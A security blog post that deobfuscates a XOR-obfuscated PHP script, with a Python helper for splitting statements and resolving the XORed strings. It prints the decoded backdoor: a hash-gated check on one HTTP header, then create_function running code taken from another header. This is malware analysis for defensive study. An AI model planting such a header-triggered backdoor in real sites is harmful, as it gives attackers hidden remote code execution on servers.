Deobfuscating a Wicked-Looking Script

Bart Blaze, one of my security researcher friends, passed along this PHP script to me. Let’s have a look.

[screenshot: 2015-03-03_01]

It looks like PHP ate some Perl and barfed it out. The first thing I asked myself was, “does this even run?” It looks like a mess, but it actually runs just fine. This script makes clever use of bitwise operators. For example…

$YzuZ=n ^ ')'; // this equates to 'G'

To make this readable, I split everything by semicolon (except when it’s between quotes). One gotcha is that this script embeds comments (# and /* */), so you have to look very closely and either leave it alone…

[screenshot: 2015-03-03_02]

Or fix it up…

[screenshot: 2015-03-03_03]
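As an added example (my own helper, not Bart’s code and not part of the original script), here is a small Python script that does the two mechanical steps just described: split the PHP source on semicolons that sit outside quotes and outside # // /* */ comments, then evaluate each literal ^ literal expression. The sample input is constructed in the same style as the script above, and a bare word next to ^ is assumed to be an undefined constant that old PHP treats as its own name.

```python
import re
# Constructed sample in the style of the script above (not the original):
SAMPLE = "$YzuZ=n ^ ')';# a;b\n$q='A;B' ^ ',_w';/* c; */$f=$q.'('.$YzuZ.')';"

def split_statements(src):
    """Split PHP source on ';' only when outside quotes and outside #, // and /* */ comments."""
    stmts, cur, quote, i, n = [], [], None, 0, len(src)
    while i < n:
        ch = src[i]
        if quote:                                  # inside a string literal
            cur.append(ch)
            if ch == "\\" and i + 1 < n:           # keep escaped char verbatim
                cur.append(src[i + 1]); i += 2; continue
            if ch == quote: quote = None
            i += 1; continue
        if ch in "'\"":
            quote = ch; cur.append(ch); i += 1; continue
        if ch == "#" or src.startswith("//", i):   # line comment: drop to end of line
            j = src.find("\n", i); i = n if j < 0 else j + 1; continue
        if src.startswith("/*", i):                # block comment: drop it entirely
            j = src.find("*/", i + 2); i = n if j < 0 else j + 2; continue
        if ch == ";":                              # statement boundary
            if s := "".join(cur).strip(): stmts.append(s)
            cur = []; i += 1; continue
        cur.append(ch); i += 1
    tail = "".join(cur).strip()
    return stmts + [tail] if tail else stmts

# One side of '^': a quoted literal, or a bare word (assumed to be an undefined
# constant, which old PHP silently treats as the string of its own name).
_SIDE = r"(?:'([^'\\]*)'|\"([^\"\\]*)\"|(?<![\w$])([A-Za-z_]\w*))"
_XOR = re.compile(_SIDE + r"\s*\^\s*" + _SIDE)

def xor_strings(a, b):
    """PHP's string ^ string: byte-wise XOR, truncated to the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))

def resolve_xor(stmt):
    """Replace each  literal ^ literal  in a statement with the string it produces."""
    def repl(m):
        a = next(g for g in m.groups()[:3] if g is not None)
        b = next(g for g in m.groups()[3:] if g is not None)
        r = xor_strings(a, b)
        if r.isprintable() and "'" not in r and "\\" not in r:
            return "'" + r + "'"
        return '"' + "".join("\\x%02x" % ord(c) for c in r) + '"'   # non-printable
    return _XOR.sub(repl, stmt)

def deobfuscate(src):
    return [resolve_xor(s) for s in split_statements(src)]
```

Running `deobfuscate(SAMPLE)` turns the first two statements into `$YzuZ='G'` and `$q='md5'`, leaving the concatenation in the third statement for the next pass.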

After I cleaned it up, I noticed that the script boils down to the last two lines. So I just echo out each of the important variables:

[screenshot: 2015-03-03_04]

When the script is executed, I get the following values:

[screenshot: 2015-03-03_05]

Now I just replace the variable names with the corresponding values to get the final result. If the MD5 of one request header (HTTP_A) matches a hard-coded hash, the script creates a function whose body is taken straight from another request header (HTTP_X_UP_CALLING_LINE_ID, which probably includes ‘preg_replace’) and then calls it, which turns this into a well-hidden backdoor.

if(md5(getenv(HTTP_A)) == 5d15db53a91790e913dc4e05a1319c42) $bIywY=create_function('$a, $b, $c', getenv(HTTP_X_UP_CALLING_LINE_ID));
$bIywY(x1o6Vm2, WFrkAj9, QcFS0u);

Be sure you check out Bart’s blog to learn more about this particular script.

This entry was posted in Malscript.